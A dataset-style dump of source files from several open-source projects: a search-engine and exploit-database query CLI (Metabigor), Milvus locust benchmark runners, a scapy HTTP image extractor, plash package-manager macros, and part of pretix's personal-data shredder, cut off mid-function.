metadata (dict) | text (string, length 60 to 3.49M)
---|---|
{
"source": "0xflotus/Metabigor",
"score": 2
} |
#### File: 0xflotus/Metabigor/metabigor.py
```python
import os, sys
import argparse
from core import config
from core import utils
from modules import fofa
from modules import shodan
from modules import censys
from modules import zoomeye
from modules import sploitus
from modules import vulners
from modules import writeups
from modules import cvedetails
__author__ = '@j3ssiejjj'
__version__ = 'v1.0'
options = {}
def parsing_argument(args):
global options
if args.config:
options['config'] = args.config
if args.query:
options['query'] = args.query
if args.query_list:
options['query_list'] = args.query_list
# query multiple sources by sending a JSON mapping of source -> query
if args.source_list:
options['source_list'] = args.source_list
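# Illustrative note (added for clarity, not in the original source): judging by
# source_parsing() below, the --source_list file should contain a JSON object
# mapping search engine name to query, e.g. (hypothetical content):
#   {"fofa": "title=\"Admin\"", "shodan": "port:8080"}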
# pattern: software | version
if args.target:
options['target'] = args.target
if args.target_list:
options['target_list'] = args.target_list
options = config.config(options, args)
source_parsing(options)
# query by module
def source_parsing(options):
# search on specific search engine which is default routine
if 'custom' in options.get('module'):
if options.get('query_list'):
queries = utils.just_read(options.get('query_list')).splitlines()
for query in queries:
options['query'] = query
single_query(options)
# query multiple sources
elif options.get('source_list'):
query_by_source = utils.get_json(utils.just_read(options.get('source_list')))
if type(query_by_source) == dict:
for key, value in query_by_source.items():
options['source'] = key
options['query'] = value
single_query(options)
else:
utils.print_bad("Look like your Source file not correct the pattern")
else:
single_query(options)
# search for exploit
if 'exploit' in options.get('module'):
if options.get('target_list'):
targets = utils.just_read(options.get('target_list')).splitlines()
for query in targets:
options['target'] = query
module_query(options)
else:
module_query(options)
def module_query(options):
utils.print_debug(options, options)
utils.print_info("Query: {0}".format(options.get('target')))
if 'exploit' in options.get('module'):
if '|' in options.get('target'):
options['product'] = options.get('target').split('|')[0].strip()
if options['relatively']:
utils.print_info("Running with relative version")
exact_version = options.get('target').split('|')[1].strip()
if '.' in exact_version:
options['version'] = exact_version.split('.')[0] + "."
else:
options['version'] = options.get(
'target').split('|')[1].strip()
else:
options['product'] = options.get('target')
sploitus.Sploitus(options)
vulners.Vulners(options)
writeups.Writeups(options)
cvedetails.Cvedetails(options)
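# Worked example for the target parsing above (illustrative, not part of the
# original code): with -t 'jira | 8.2.1' the product becomes 'jira'; with
# --rel the version is reduced to the major prefix '8.', otherwise the exact
# string '8.2.1' is used.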
# really do a query
def single_query(options):
utils.print_debug(options, options)
utils.print_info("Query: {0}".format(options.get('query')))
if not options.get('source'):
utils.print_bad("You need to specify Search engine")
return
if 'fofa' in options.get('source'):
fofa.Fofa(options)
if 'shodan' in options.get('source'):
shodan.Shodan(options)
if 'censys' in options.get('source'):
censys.Censys(options)
if 'zoom' in options.get('source'):
zoomeye.ZoomEye(options)
def main():
config.banner(__author__, __version__)
parser = argparse.ArgumentParser(
description="Command line Search Engines without any API key")
parser.add_argument('-c', '--config', action='store', dest='config',
help='config file', default='config.conf')
parser.add_argument('--cookies', action='store',
dest='cookies', help='cookie content to send with requests')
parser.add_argument('-m', '--module', action='store',
dest='module', help='Specify a predefined module', default='custom')
parser.add_argument('-t', '--target', action='store',
dest='target', help="Target for module (pattern: -t 'software|version')")
parser.add_argument('-T', '--target_list', action='store',
dest='target_list', help='List of targets for the module')
parser.add_argument('-s', '--source', action='store',
dest='source', help='name of search engine (e.g: shodan, censys, fofa)')
parser.add_argument('-S', '--source_list', action='store',
dest='source_list', help='JSON config for multiple search engines (e.g: shodan, censys, fofa)')
parser.add_argument('-q', '--query', action='store',
dest='query', help='Query from search engine')
parser.add_argument('-Q', '--query_list', action='store',
dest='query_list', help='List of queries for the search engine')
parser.add_argument('-d', '--outdir', action='store',
dest='outdir', help='Directory output', default='.')
parser.add_argument('-o', '--output', action='store',
dest='output', help='Output file name', default='output')
parser.add_argument('--raw', action='store',
dest='raw', help='Directory to store raw query', default='raw')
parser.add_argument('--proxy', action='store',
dest='proxy', help='Proxy for requests to the search engine (e.g: http://127.0.0.1:8080)')
parser.add_argument('-b', action='store_true', dest='brute', help='Auto brute force the country code')
parser.add_argument('--disable_pages', action='store_true', dest='disable_pages', help="Don't loop through the pages")
parser.add_argument('--store_content', action='store_true',
dest='store_content', help="Store the raw HTML source or not")
parser.add_argument('-hh', action='store_true', dest='helps', help='Print more help')
parser.add_argument('-M', action='store_true',
dest='modules_help', help='Print available modules')
parser.add_argument('--rel', action='store_true',
dest='relatively', help='Use relative version matching (major version only)')
parser.add_argument('--debug', action='store_true', dest='debug', help='Print debug output')
parser.add_argument('--update', action='store_true',
dest='update', help='Update to the latest version from git')
args = parser.parse_args()
if len(sys.argv) == 1 or args.helps:
config.custom_help()
if args.modules_help:
config.modules_help()
if args.update:
config.update()
parsing_argument(args)
if __name__ == '__main__':
main()
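# Example invocations (illustrative only, inferred from the argparse options
# above; exact flags may differ between releases):
#   python3 metabigor.py -s fofa -q 'title="CMS"'
#   python3 metabigor.py -m exploit -t 'apache|2.4.17'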
``` |
{
"source": "0xflotus/milvus",
"score": 2
} |
#### File: milvus_benchmark/runners/locust.py
```python
import pdb
import time
import copy
import logging
from . import locust_user
from .base import BaseRunner
from milvus_benchmark import parser
from milvus_benchmark import utils
from milvus_benchmark.runners import utils as runner_utils
logger = logging.getLogger("milvus_benchmark.runners.locust")
class LocustRunner(BaseRunner):
def __init__(self, env, metric):
super(LocustRunner, self).__init__(env, metric)
def run_case(self, case_metric, **case_param):
collection_name = case_param["collection_name"]
task = case_param["task"]
connection_type = case_param["connection_type"]
# spawn locust requests
task["during_time"] = utils.timestr_to_int(task["during_time"])
task_types = task["types"]
run_params = {"tasks": {}}
run_params.update(task)
info_in_params = {
"index_field_name": case_param["index_field_name"],
"vector_field_name": case_param["vector_field_name"],
"dimension": case_param["dimension"],
"collection_info": self.milvus.get_info(collection_name)}
logger.info(info_in_params)
run_params.update({"op_info": info_in_params})
for task_type in task_types:
run_params["tasks"].update({
task_type["type"]: {
"weight": task_type["weight"] if "weight" in task_type else 1,
"params": task_type["params"] if "params" in task_type else None,
}
})
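# Illustrative sketch (assumption, not taken from the original benchmark
# configs): the `task` dict consumed here is expected to look roughly like
#   {"during_time": "2h", "connection_num": 1,
#    "types": [{"type": "query", "weight": 20, "params": {...}}]}
# where each entry in "types" becomes a weighted locust task.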
# collect stats
# pdb.set_trace()
logger.info(run_params)
locust_stats = locust_user.locust_executor(self.hostname, self.port, collection_name,
connection_type=connection_type, run_params=run_params)
return locust_stats
class LocustInsertRunner(LocustRunner):
"""run insert"""
name = "locust_insert_performance"
def __init__(self, env, metric):
super(LocustInsertRunner, self).__init__(env, metric)
def extract_cases(self, collection):
collection_name = collection["collection_name"] if "collection_name" in collection else None
(data_type, collection_size, dimension, metric_type) = parser.collection_parser(collection_name)
ni_per = collection["ni_per"]
build_index = collection["build_index"] if "build_index" in collection else False
vector_type = runner_utils.get_vector_type(data_type)
other_fields = collection["other_fields"] if "other_fields" in collection else None
collection_info = {
"dimension": dimension,
"metric_type": metric_type,
"dataset_name": collection_name,
"collection_size": collection_size,
"other_fields": other_fields,
"ni_per": ni_per
}
index_field_name = None
index_type = None
index_param = None
index_info = None
vector_field_name = runner_utils.get_default_field_name(vector_type)
if build_index is True:
index_type = collection["index_type"]
index_param = collection["index_param"]
index_info = {
"index_type": index_type,
"index_param": index_param
}
index_field_name = runner_utils.get_default_field_name(vector_type)
task = collection["task"]
connection_type = "single"
connection_num = task["connection_num"]
if connection_num > 1:
connection_type = "multi"
run_params = {
"task": collection["task"],
"connection_type": connection_type,
}
self.init_metric(self.name, collection_info, index_info, None, run_params)
case_metric = copy.deepcopy(self.metric)
case_metric.set_case_metric_type()
case_metrics = list()
case_params = list()
case_metrics.append(case_metric)
case_param = {
"collection_name": collection_name,
"data_type": data_type,
"dimension": dimension,
"collection_size": collection_size,
"ni_per": ni_per,
"metric_type": metric_type,
"vector_type": vector_type,
"other_fields": other_fields,
"build_index": build_index,
"index_field_name": index_field_name,
"vector_field_name": vector_field_name,
"index_type": index_type,
"index_param": index_param,
"task": collection["task"],
"connection_type": connection_type,
}
case_params.append(case_param)
return case_params, case_metrics
def prepare(self, **case_param):
collection_name = case_param["collection_name"]
dimension = case_param["dimension"]
vector_type = case_param["vector_type"]
other_fields = case_param["other_fields"]
index_field_name = case_param["index_field_name"]
build_index = case_param["build_index"]
self.milvus.set_collection(collection_name)
if self.milvus.exists_collection():
logger.debug("Start drop collection")
self.milvus.drop()
time.sleep(runner_utils.DELETE_INTERVAL_TIME)
self.milvus.create_collection(dimension, data_type=vector_type,
other_fields=other_fields)
# TODO: update fields in collection_info
# fields = self.get_fields(self.milvus, collection_name)
# collection_info = {
# "dimension": dimension,
# "metric_type": metric_type,
# "dataset_name": collection_name,
# "fields": fields
# }
if build_index is True:
if case_param["index_type"]:
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
logger.debug(self.milvus.describe_index(index_field_name))
else:
build_index = False
logger.warning("Please specify the index_type")
class LocustSearchRunner(LocustRunner):
"""run search"""
name = "locust_search_performance"
def __init__(self, env, metric):
super(LocustSearchRunner, self).__init__(env, metric)
def extract_cases(self, collection):
collection_name = collection["collection_name"] if "collection_name" in collection else None
(data_type, collection_size, dimension, metric_type) = parser.collection_parser(collection_name)
ni_per = collection["ni_per"]
build_index = collection["build_index"] if "build_index" in collection else False
vector_type = runner_utils.get_vector_type(data_type)
other_fields = collection["other_fields"] if "other_fields" in collection else None
collection_info = {
"dimension": dimension,
"metric_type": metric_type,
"dataset_name": collection_name,
"collection_size": collection_size,
"other_fields": other_fields,
"ni_per": ni_per
}
index_field_name = None
index_type = None
index_param = None
index_info = None
if build_index is True:
index_type = collection["index_type"]
index_param = collection["index_param"]
index_info = {
"index_type": index_type,
"index_param": index_param
}
index_field_name = runner_utils.get_default_field_name(vector_type)
vector_field_name = runner_utils.get_default_field_name(vector_type)
task = collection["task"]
connection_type = "single"
connection_num = task["connection_num"]
if connection_num > 1:
connection_type = "multi"
run_params = {
"task": collection["task"],
"connection_type": connection_type,
}
self.init_metric(self.name, collection_info, index_info, None, run_params)
case_metric = copy.deepcopy(self.metric)
# set metric type as case
case_metric.set_case_metric_type()
case_metrics = list()
case_params = list()
case_metrics.append(case_metric)
case_param = {
"collection_name": collection_name,
"data_type": data_type,
"dimension": dimension,
"collection_size": collection_size,
"ni_per": ni_per,
"metric_type": metric_type,
"vector_type": vector_type,
"other_fields": other_fields,
"build_index": build_index,
"index_field_name": index_field_name,
"vector_field_name": vector_field_name,
"index_type": index_type,
"index_param": index_param,
"task": collection["task"],
"connection_type": connection_type,
}
case_params.append(case_param)
return case_params, case_metrics
def prepare(self, **case_param):
collection_name = case_param["collection_name"]
dimension = case_param["dimension"]
vector_type = case_param["vector_type"]
other_fields = case_param["other_fields"]
index_field_name = case_param["index_field_name"]
metric_type = case_param["metric_type"]
build_index = case_param["build_index"]
self.milvus.set_collection(collection_name)
if self.milvus.exists_collection():
logger.debug("Start drop collection")
self.milvus.drop()
time.sleep(runner_utils.DELETE_INTERVAL_TIME)
self.milvus.create_collection(dimension, data_type=vector_type,
other_fields=other_fields)
# TODO: update fields in collection_info
# fields = self.get_fields(self.milvus, collection_name)
# collection_info = {
# "dimension": dimension,
# "metric_type": metric_type,
# "dataset_name": collection_name,
# "fields": fields
# }
if build_index is True:
if case_param["index_type"]:
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
logger.debug(self.milvus.describe_index(index_field_name))
else:
build_index = False
logger.warning("Please specify the index_type")
self.insert(self.milvus, collection_name, case_param["data_type"], dimension, case_param["collection_size"], case_param["ni_per"])
build_time = 0.0
start_time = time.time()
self.milvus.flush()
flush_time = round(time.time()-start_time, 2)
logger.debug(self.milvus.count())
if build_index is True:
logger.debug("Start build index for last file")
start_time = time.time()
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
build_time = round(time.time()-start_time, 2)
logger.debug({"flush_time": flush_time, "build_time": build_time})
logger.info(self.milvus.count())
logger.info("Start load collection")
load_start_time = time.time()
self.milvus.load_collection()
logger.debug({"load_time": round(time.time()-load_start_time, 2)})
# search_param = None
# for op in case_param["task"]["types"]:
# if op["type"] == "query":
# search_param = op["params"]["search_param"]
# break
# logger.info("index_field_name: {}".format(index_field_name))
# TODO: enable warm query
# self.milvus.warm_query(index_field_name, search_param, metric_type, times=2)
class LocustRandomRunner(LocustRunner):
"""run random interface"""
name = "locust_random_performance"
def __init__(self, env, metric):
super(LocustRandomRunner, self).__init__(env, metric)
def extract_cases(self, collection):
collection_name = collection["collection_name"] if "collection_name" in collection else None
(data_type, collection_size, dimension, metric_type) = parser.collection_parser(collection_name)
ni_per = collection["ni_per"]
build_index = collection["build_index"] if "build_index" in collection else False
vector_type = runner_utils.get_vector_type(data_type)
other_fields = collection["other_fields"] if "other_fields" in collection else None
collection_info = {
"dimension": dimension,
"metric_type": metric_type,
"dataset_name": collection_name,
"collection_size": collection_size,
"other_fields": other_fields,
"ni_per": ni_per
}
index_field_name = None
index_type = None
index_param = None
index_info = None
vector_field_name = runner_utils.get_default_field_name(vector_type)
if build_index is True:
index_type = collection["index_type"]
index_param = collection["index_param"]
index_info = {
"index_type": index_type,
"index_param": index_param
}
index_field_name = runner_utils.get_default_field_name(vector_type)
task = collection["task"]
connection_type = "single"
connection_num = task["connection_num"]
if connection_num > 1:
connection_type = "multi"
run_params = {
"task": collection["task"],
"connection_type": connection_type,
}
self.init_metric(self.name, collection_info, index_info, None, run_params)
case_metric = copy.deepcopy(self.metric)
case_metric.set_case_metric_type()
case_metrics = list()
case_params = list()
case_metrics.append(case_metric)
case_param = {
"collection_name": collection_name,
"data_type": data_type,
"dimension": dimension,
"collection_size": collection_size,
"ni_per": ni_per,
"metric_type": metric_type,
"vector_type": vector_type,
"other_fields": other_fields,
"build_index": build_index,
"index_field_name": index_field_name,
"vector_field_name": vector_field_name,
"index_type": index_type,
"index_param": index_param,
"task": collection["task"],
"connection_type": connection_type,
}
case_params.append(case_param)
return case_params, case_metrics
def prepare(self, **case_param):
collection_name = case_param["collection_name"]
dimension = case_param["dimension"]
vector_type = case_param["vector_type"]
other_fields = case_param["other_fields"]
index_field_name = case_param["index_field_name"]
build_index = case_param["build_index"]
self.milvus.set_collection(collection_name)
if self.milvus.exists_collection():
logger.debug("Start drop collection")
self.milvus.drop()
time.sleep(runner_utils.DELETE_INTERVAL_TIME)
self.milvus.create_collection(dimension, data_type=vector_type,
other_fields=other_fields)
# TODO: update fields in collection_info
# fields = self.get_fields(self.milvus, collection_name)
# collection_info = {
# "dimension": dimension,
# "metric_type": metric_type,
# "dataset_name": collection_name,
# "fields": fields
# }
if build_index is True:
if case_param["index_type"]:
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
logger.debug(self.milvus.describe_index(index_field_name))
else:
build_index = False
logger.warning("Please specify the index_type")
self.insert(self.milvus, collection_name, case_param["data_type"], dimension, case_param["collection_size"], case_param["ni_per"])
build_time = 0.0
start_time = time.time()
self.milvus.flush()
flush_time = round(time.time()-start_time, 2)
logger.debug(self.milvus.count())
if build_index is True:
logger.debug("Start build index for last file")
start_time = time.time()
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
build_time = round(time.time()-start_time, 2)
logger.debug({"flush_time": flush_time, "build_time": build_time})
logger.info(self.milvus.count())
logger.info("Start load collection")
load_start_time = time.time()
self.milvus.load_collection()
logger.debug({"load_time": round(time.time()-load_start_time, 2)})
``` |
{
"source": "0xflotus/netimages",
"score": 3
} |
#### File: netimages/netimages/extractor.py
```python
from scapy.all import load_layer
from scapy.layers.http import HTTP, HTTPResponse
load_layer("http")
def extract_http_images(packets):
for packet in packets:
if packet.haslayer(HTTPResponse):
p = packet[HTTP]
if p.Content_Type and b"image" in p.Content_Type:
yield packet.load, p.Location
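# Usage sketch (illustrative; "capture.pcap" is a hypothetical file name):
#   from scapy.all import rdpcap
#   for payload, location in extract_http_images(rdpcap("capture.pcap")):
#       ...  # payload holds the raw image bytes of the HTTP response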
``` |
{
"source": "0xflotus/plash",
"score": 2
} |
#### File: plash/macros/packagemanagers.py
```python
from plash.eval import eval, register_macro, shell_escape_args
@register_macro()
def defpm(name, *lines):
'define a new package manager'
@register_macro(name, group='package managers')
@shell_escape_args
def package_manager(*packages):
if not packages:
return
sh_packages = ' '.join(pkg for pkg in packages)
expanded_lines = [line.format(sh_packages) for line in lines]
return eval([['run'] + expanded_lines])
package_manager.__doc__ = "install packages with {}".format(name)
eval([[
'defpm',
'apt',
'apt-get update',
'apt-get install -y {}',
], [
'defpm',
'add-apt-repository',
'apt-get install software-properties-common',
'run add-apt-repository -y {}',
], [
'defpm',
'apk',
'apk update',
'apk add {}',
], [
'defpm',
'yum',
'yum install -y {}',
], [
'defpm',
'dnf',
'dnf install -y {}',
], [
'defpm',
'pip',
'pip install {}',
], [
'defpm',
'pip3',
'pip3 install {}',
], [
'defpm',
'npm',
'npm install -g {}',
], [
'defpm',
'pacman',
'pacman -Sy --noconfirm {}',
], [
'defpm',
'emerge',
'emerge {}',
]])
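# Illustrative note (not part of the original file): assuming eval() dispatches
# a list whose head is a registered macro name (as the defpm calls above rely
# on), a later eval([['apt', 'git', 'vim']]) would expand to
# eval([['run', 'apt-get update', 'apt-get install -y git vim']]).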
```
#### File: plash/plash/utils.py
```python
import os
import sys
from contextlib import contextmanager
from os.path import join
ERROR_COLOR = 1
INFO_COLOR = 4
def hashstr(stri):
import hashlib
return hashlib.sha1(stri).hexdigest()
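# Doctest-style example (illustrative): hashstr expects bytes, e.g.
#   hashstr(b'abc') == 'a9993e364706816aba3e25717850c26c9cd0d89d'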
@contextmanager
def catch_and_die(exceptions,
debug=None,
debug_class=False,
ignore=None,
silent=False,
exit=1):
try:
yield
except tuple(exceptions) as exc:
if ignore and isinstance(exc, ignore):
raise
if silent:
sys.exit(exit)
msg = str(exc)
if msg.startswith('<') and msg.endswith('>'):
msg = msg[1:-1]
if debug_class:
debug = exc.__class__.__name__
if debug:
msg = '{debug}: {message}'.format(debug=debug, message=msg)
die(msg, exit=exit)
def get_plash_data():
if os.getuid():
default = '~/.plashdata'
else:
default = '/var/lib/plash'
dir = os.environ.get('PLASH_DATA', default)
return os.path.expanduser(dir)
def color(stri, color, isatty_fd_check=2):
if os.environ.get('TERM') != 'dumb' and os.isatty(isatty_fd_check):
return "\033[38;05;{}m".format(int(color)) + stri + "\033[0;0m"
return stri
def die(msg, exit=1):
prog = os.path.basename(sys.argv[0])
print(
'{} {}'.format(color('plash error:', ERROR_COLOR), msg),
file=sys.stderr)
sys.exit(exit)
def info(msg):
print(color(msg, INFO_COLOR), file=sys.stderr)
def die_with_usage(*, hint=False):
prog = os.path.basename(sys.argv[0])
printed_usage = False
with open(sys.argv[0]) as f:
for line in f.readlines():
if line.startswith('# usage:'):
usage_line = line[2:]
print('{}: {}'.format(prog, usage_line), end='')
printed_usage = True
assert printed_usage, 'could not find usage comment'
if hint:
print('{}: usage hint: {}'.format(prog, hint), file=sys.stderr)
sys.exit(2)
def handle_help_flag():
if len(sys.argv) >= 2 and sys.argv[1] in ('--help', '-h'):
with open(sys.argv[0]) as f:
do_print = False
for line in f.readlines():
if line.startswith('# usage:'):
do_print = True
elif line and not line.startswith('#'):
break
if do_print:
print(line[2:].rstrip('\n'))
sys.exit(0)
def filter_positionals(args):
positional = []
filtered_args = []
found_first_opt = False
while args:
arg = args.pop(0)
if not arg.startswith('-') and not found_first_opt:
positional.append(arg)
elif arg == '--':
positional += args
args = None
else:
filtered_args.append(arg)
found_first_opt = True
return positional, filtered_args
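# Worked examples (illustrative, not from the original source):
#   filter_positionals(['alpine', 'ls', '--', '-la']) -> (['alpine', 'ls', '-la'], [])
#   filter_positionals(['a', '-x', 'b'])              -> (['a'], ['-x', 'b'])
# Leading non-dash arguments are positional, everything after '--' is
# positional, and anything from the first option onwards is filtered out.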
def handle_build_args():
import subprocess
if len(sys.argv) >= 2 and sys.argv[1].startswith('-'):
cmd, args = filter_positionals(sys.argv[1:])
with catch_and_die([subprocess.CalledProcessError], silent=True):
out = subprocess.check_output(['plash-build'] + args)
container_id = out[:-1]
os.execlp(sys.argv[0], sys.argv[0], container_id, *cmd)
def nodepath_or_die(container, allow_root_container=False):
import subprocess
extra = [] if not allow_root_container else ['--allow-root-container']
with catch_and_die([subprocess.CalledProcessError], silent=True):
return subprocess.check_output(
['plash-nodepath', str(container)] + extra, ).decode().strip('\n')
def get_default_shell(passwd_file):
with open(passwd_file) as f:
# the first entry is the root entry
# https://security.stackexchange.com/questions/96241/why-require-root-to-be-the-first-entry-in-etc-passwd
root_entry = f.readline().rstrip('\n')
default_root_shell = root_entry.split(":")[6]
return default_root_shell
def get_default_user_shell():
import pwd
return pwd.getpwuid(os.getuid()).pw_shell
def plash_map(*args):
'thin wrapper around plash map'
from subprocess import check_output
out = check_output(['plash-map'] + list(args))
if out == b'':
return None
return out.decode().strip('\n')
def assert_initialized():
last_inited = join(get_plash_data(), 'index', '0')
if not os.path.exists(last_inited):
die('first run `plash init`')
def run_write_read(cmd, input):
import subprocess
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(input)
p.stdin.close()
exit = p.wait()
if exit:
raise subprocess.CalledProcessError(exit, cmd)
return p.stdout.read()
def mkdtemp():
import tempfile
return tempfile.mkdtemp(
dir=os.path.join(get_plash_data(), 'tmp'),
prefix='plashtmp_{}_{}_'.format(os.getsid(0), os.getpid()))
``` |
{
"source": "0xflotus/pretix",
"score": 2
} |
#### File: pretix/base/shredder.py
```python
import json
from datetime import timedelta
from typing import List, Tuple
from django.db import transaction
from django.db.models import Max, Q
from django.db.models.functions import Greatest
from django.dispatch import receiver
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from pretix.api.serializers.order import (
AnswerSerializer, InvoiceAddressSerializer,
)
from pretix.api.serializers.waitinglist import WaitingListSerializer
from pretix.base.i18n import LazyLocaleException
from pretix.base.models import (
CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, OrderPayment,
OrderPosition, OrderRefund, QuestionAnswer,
)
from pretix.base.services.invoices import invoice_pdf_task
from pretix.base.signals import register_data_shredders
from pretix.helpers.json import CustomJSONEncoder
class ShredError(LazyLocaleException):
pass
def shred_constraints(event: Event):
if event.has_subevents:
max_date = event.subevents.aggregate(
max_from=Max('date_from'),
max_to=Max('date_to'),
max_fromto=Greatest(Max('date_to'), Max('date_from'))
)
max_date = max_date['max_fromto'] or max_date['max_to'] or max_date['max_from']
if max_date is not None and max_date > now() - timedelta(days=30):
return _('Your event needs to be over for at least 30 days to use this feature.')
else:
if (event.date_to or event.date_from) > now() - timedelta(days=30):
return _('Your event needs to be over for at least 30 days to use this feature.')
if event.live:
return _('Your ticket shop needs to be offline to use this feature.')
return None
class BaseDataShredder:
"""
This is the base class for all data shredders.
"""
def __init__(self, event: Event):
self.event = event
def __str__(self):
return self.identifier
def generate_files(self) -> List[Tuple[str, str, str]]:
"""
This method is called to export the data that is about to be shred and return a list of tuples consisting of a
filename, a file type and file content.
You can also implement this as a generator and ``yield`` those tuples instead of returning a list of them.
"""
raise NotImplementedError() # NOQA
def shred_data(self):
"""
This method is called to actually remove the data from the system. You should remove any database objects
here.
You should never delete ``LogEntry`` objects, but you might modify them to remove personal data. In this
case, set the ``LogEntry.shredded`` attribute to ``True`` to show that this is no longer original log data.
"""
raise NotImplementedError() # NOQA
@property
def tax_relevant(self):
"""
Indicates whether this removes potentially tax-relevant data.
"""
return False
@property
def verbose_name(self) -> str:
"""
A human-readable name for what this shredder removes. This should be short but self-explanatory.
Good examples include 'E-Mail addresses' or 'Invoices'.
"""
raise NotImplementedError() # NOQA
@property
def identifier(self) -> str:
"""
A short and unique identifier for this shredder.
This should only contain lowercase letters and in most
cases will be the same as your package name.
"""
raise NotImplementedError() # NOQA
@property
def description(self) -> str:
"""
A more detailed description of what this shredder does. Can contain HTML.
"""
raise NotImplementedError() # NOQA
def shred_log_fields(logentry, banlist=None, whitelist=None):
d = logentry.parsed_data
if whitelist:
for k, v in d.items():
if k not in whitelist:
d[k] = '█'
elif banlist:
for f in banlist:
if f in d:
d[f] = '█'
logentry.data = json.dumps(d)
logentry.shredded = True
logentry.save(update_fields=['data', 'shredded'])
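# Illustrative behaviour (example values are hypothetical): with
# banlist=['email'], a parsed_data of {'email': 'a@b.c', 'code': 'X1'} is
# rewritten to {'email': '█', 'code': 'X1'} and the entry is marked shredded.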
class PhoneNumberShredder(BaseDataShredder):
verbose_name = _('Phone numbers')
identifier = 'phone_numbers'
description = _('This will remove all phone numbers from orders.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'phone-by-order.json', 'application/json', json.dumps({
o.code: o.phone for o in self.event.orders.filter(phone__isnull=False)
}, cls=CustomJSONEncoder, indent=4)
@transaction.atomic
def shred_data(self):
for o in self.event.orders.all():
o.phone = None
d = o.meta_info_data
if d:
if 'contact_form_data' in d and 'phone' in d['contact_form_data']:
del d['contact_form_data']['phone']
o.meta_info = json.dumps(d)
o.save(update_fields=['meta_info', 'phone'])
for le in self.event.logentry_set.filter(action_type="pretix.event.order.phone.changed"):
shred_log_fields(le, banlist=['old_phone', 'new_phone'])
class EmailAddressShredder(BaseDataShredder):
verbose_name = _('E-mails')
identifier = 'order_emails'
description = _('This will remove all e-mail addresses from orders and attendees, as well as logged email '
'contents.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'emails-by-order.json', 'application/json', json.dumps({
o.code: o.email for o in self.event.orders.filter(email__isnull=False)
}, indent=4)
yield 'emails-by-attendee.json', 'application/json', json.dumps({
'{}-{}'.format(op.order.code, op.positionid): op.attendee_email
for op in OrderPosition.all.filter(order__event=self.event, attendee_email__isnull=False)
}, indent=4)
@transaction.atomic
def shred_data(self):
OrderPosition.all.filter(order__event=self.event, attendee_email__isnull=False).update(attendee_email=None)
for o in self.event.orders.all():
o.email = None
d = o.meta_info_data
if d:
if 'contact_form_data' in d and 'email' in d['contact_form_data']:
del d['contact_form_data']['email']
o.meta_info = json.dumps(d)
o.save(update_fields=['meta_info', 'email'])
for le in self.event.logentry_set.filter(action_type__contains="order.email"):
shred_log_fields(le, banlist=['recipient', 'message', 'subject'])
for le in self.event.logentry_set.filter(action_type="pretix.event.order.contact.changed"):
shred_log_fields(le, banlist=['old_email', 'new_email'])
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'data' in d:
for row in d['data']:
if 'attendee_email' in row:
row['attendee_email'] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class WaitingListShredder(BaseDataShredder):
verbose_name = _('Waiting list')
identifier = 'waiting_list'
description = _('This will remove all email addresses from the waiting list.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'waiting-list.json', 'application/json', json.dumps([
WaitingListSerializer(wle).data
for wle in self.event.waitinglistentries.all()
], indent=4)
@transaction.atomic
def shred_data(self):
self.event.waitinglistentries.update(email='█')
for wle in self.event.waitinglistentries.select_related('voucher').filter(voucher__isnull=False):
if '@' in wle.voucher.comment:
wle.voucher.comment = '█'
wle.voucher.save(update_fields=['comment'])
for le in self.event.logentry_set.filter(action_type="pretix.voucher.added.waitinglist").exclude(data=""):
d = le.parsed_data
d['email'] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class AttendeeInfoShredder(BaseDataShredder):
verbose_name = _('Attendee info')
identifier = 'attendee_info'
description = _('This will remove all attendee names and postal addresses from order positions, as well as logged '
'changes to them.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'attendee-info.json', 'application/json', json.dumps({
'{}-{}'.format(op.order.code, op.positionid): {
'name': op.attendee_name,
'company': op.company,
'street': op.street,
'zipcode': op.zipcode,
'city': op.city,
'country': str(op.country) if op.country else None,
'state': op.state
} for op in OrderPosition.all.filter(
order__event=self.event
).filter(
Q(Q(attendee_name_cached__isnull=False) | Q(attendee_name_parts__isnull=False))
)
}, indent=4)
@transaction.atomic
def shred_data(self):
OrderPosition.all.filter(
order__event=self.event
).filter(
Q(attendee_name_cached__isnull=False) | Q(attendee_name_parts__isnull=False) |
Q(company__isnull=False) | Q(street__isnull=False) | Q(zipcode__isnull=False) | Q(city__isnull=False)
).update(attendee_name_cached=None, attendee_name_parts={'_shredded': True}, company=None, street=None,
zipcode=None, city=None)
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'data' in d:
for i, row in enumerate(d['data']):
if 'attendee_name' in row:
d['data'][i]['attendee_name'] = '█'
if 'attendee_name_parts' in row:
d['data'][i]['attendee_name_parts'] = {
'_legacy': '█'
}
if 'company' in row:
d['data'][i]['company'] = '█'
if 'street' in row:
d['data'][i]['street'] = '█'
if 'zipcode' in row:
d['data'][i]['zipcode'] = '█'
if 'city' in row:
d['data'][i]['city'] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class InvoiceAddressShredder(BaseDataShredder):
verbose_name = _('Invoice addresses')
identifier = 'invoice_addresses'
tax_relevant = True
description = _('This will remove all invoice addresses from orders, as well as logged changes to them.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'invoice-addresses.json', 'application/json', json.dumps({
ia.order.code: InvoiceAddressSerializer(ia).data
for ia in InvoiceAddress.objects.filter(order__event=self.event)
}, indent=4)
@transaction.atomic
def shred_data(self):
InvoiceAddress.objects.filter(order__event=self.event).delete()
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
